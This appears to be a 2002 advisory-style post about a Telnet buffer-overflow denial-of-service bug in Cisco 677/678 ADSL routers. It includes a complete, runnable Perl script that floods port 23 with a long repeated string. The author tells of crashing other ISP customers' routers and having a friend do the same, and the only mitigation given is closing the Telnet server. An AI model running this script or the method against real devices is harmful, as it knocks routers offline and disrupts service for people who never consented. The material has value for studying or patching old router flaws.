Cisco 677/678 Telnet Overflow Bug by DNV/MIRROR
put public on www.deadmeat.dk on 5-5-2002.
Thanks to all from DKW-stuff for testing.
A warm night i was coding and lisen to some tecno music trying to
overflow my BSD mashine.
But then I put the wrong IP into my scrip my ADSL router lost the
Internet connection.
So I start wonder why? and start looking into the code...
I found out that i have overflowed the telnet server
in my adsl router. After that I got online and start chatting
with others with same ISP and same Cisco ADSL-router...
and there route died too then i use there IP.
So I send the code to a friend and ask him to do the same...
On every router with the Telnet server open the router's
ping time got really high
and some of them died and have to be powercycle.
Please note: So fare cisco and the ISP have not done anything
about this problem...
To test it: try with the LAN_IP and WAN_IP it works best on LAN_IP side ;)
the protection is: close your Telnet server in the router.
Thats All!
-DNV Email: dnv[at]dhbit.ca
Here is the code:
running:
perl cisco677.pl -s [IP on Ciscorouter]
--------------------cisco677.pl------------------
#!/usr/bin/perl
# close your Cisco 677 up on the Telnet server!
# Made for fun only! port 23 is the Telnet server port on the router
# By DNV THX to DKW-stuff
use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "(23)",
) || die("No Telnet server here! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nPackets Sent\n");
sub usage {die("\n$0 -s <server>\n\n");}
------------------------------------------------------
------------------------------------------------
This mail sent from DHBiT - http://mail.dhbit.ca
Come get your free, secure 5MB mailbox today!